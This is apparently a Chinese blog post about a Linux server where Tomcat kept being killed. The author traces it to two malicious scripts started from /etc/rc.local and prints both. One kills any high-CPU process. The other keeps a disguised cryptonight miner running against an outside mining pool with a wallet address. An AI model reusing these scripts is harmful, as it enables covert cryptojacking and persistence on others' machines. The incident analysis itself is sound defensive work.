最近启动tomcat，还在启动过程中无缘无故tomcat进程就消失了，怎么找都找不到原因，tomcat日志和系统日志都没有任何显示，问了牛人后说被kill掉是不会有任何日志的，初步怀疑是中毒了。最后百度了一下，说病毒通常都会随系统的启动而启动，运行crontab -l没有发现，最后在/etc/rc.local发现启动了两个奇怪的脚本,/boot/efi/killer.sh和/boot/efi/daemon.sh，

killer.sh如下：

#!/bin/bash
#
killer.sh
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
whiletrue;
do
psaxf-o"pid%cpucommand"|grep-vbashd|awk'{if($2>=80.0)print$1}'|whilereadprocid
do
kill-9$procid
done
sleep3
done

killer.sh会kill掉cpu使用率超过80%的进程,tomcat启动过程极大可能超过80%而被kill掉

daemon.sh如下：

#!/bin/bash
#
daemon.sh
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
whiletrue;
do
server=`psaux|grepbashd|grep-vgrep`
if[!"$server"];then
\cp-rf/boot/grub/
grub.tz
/usr/sbin/bashd
chmod+x/usr/sbin/bashd
nohupbashd-acryptonight-ostratum+tcp://
get.bi-chi.com:3333
-u47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG-px&
fi
sleep15
done

查找了get.bi-chi.com:3333这个域名，似乎跟挖矿有关。。。

最后处理方法是删除了这两个文件，然后查找这两个脚本的进程，kill掉，问题似乎解决了。

先凑合着这么解决了，等过几天再把系统重装了，奇怪的事，防火墙平时都是开启的，不知道什么时候就被人攻陷了。